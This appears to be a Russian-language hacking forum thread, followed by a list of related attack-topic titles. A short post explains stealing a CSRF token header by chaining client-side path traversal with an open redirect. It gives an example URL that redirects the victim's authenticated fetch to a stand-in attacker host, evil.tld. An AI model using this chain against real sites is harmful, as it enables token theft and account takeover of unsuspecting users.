Про сlient-side path traversal

PowerDevil · 28 мар 2024

Не все знают, но если на сайте есть open redirect и client side path traversal вы можете воровать заголовок с CSRF токеном через CORS запрос.
Например, если приложение через
⁡fetch()
⁡ добавляет заголовок
⁡csrfToken
⁡при обращении к
⁡/api/user,
⁡ то с помощью path traversal и open redirect'а мы можем похитить заголовок, отправив жертву на
⁡/api/user/../redirect?to=evil.tld/corsAllow
⁡

WhatACat · 28 мар 2024

По-моему недавно видел подобную тему уже

Всё о sql injections и no sql injections и их эксплотации

О csrf attack и важности csrf token на твоём сайте

Как просмотреть любое видео у любого юзера вконторы

У вас остался старый тунель в playit.gg и никак не можете его удалить ? РЕШИМ

Лутаем дополнительные ******

Обходим лаунчер Social Club в играх ( GTA IV, GTA V, RDR II и т.п)

Знакомство с веб сканером уязвимостей Nikto и эксплотация XSS

Пример эксплуатации уязвимости WebSocket (Burp Suite)

Всё о File Inclusion и Remote file inclusion

Взлом игр в Telegram.

Заливка шелла на vBulletin 5

Регистрируем Yandex аккаунт на TempMail

XSS Administrator Escalation (WP) | Повышение прав к админу | Получаем доступ без ограничений

Заходим в аккаунт через Cookie на примере Roblox

Windows Theme Spoofing CVE-2024-21320

WAF bypass. Как вызнать IP сайта, который использует WAF или защиту от DDoS

Получаем аккаунт на xaker.ru без регистрации (без подписки)

Уязвимость в ПО удаленного доступа

История о том, как я полностью взламывал wordpress сайты..

RCE с помощью загрузки плагина (CVE-2024-31210)

Обход защиты от XSS

Как работала уязвимость Telegram

#4. php object injection уязвимости.

Новая утечка Telegram l Снос ботов в 2 клика

Уязвимость в телеграме из-за которого можно словить *******

Как редиректить ****** во избежание КТ

Про сlient-side path traversal

Уязвимости регистрации: максимизация угрозы

Фаззим исполняемые файлы при помощи AFL++ с санитайзерами

Взлом сайта Telegram / Вставляем свой текст на сайт

Про сlient-side path traversal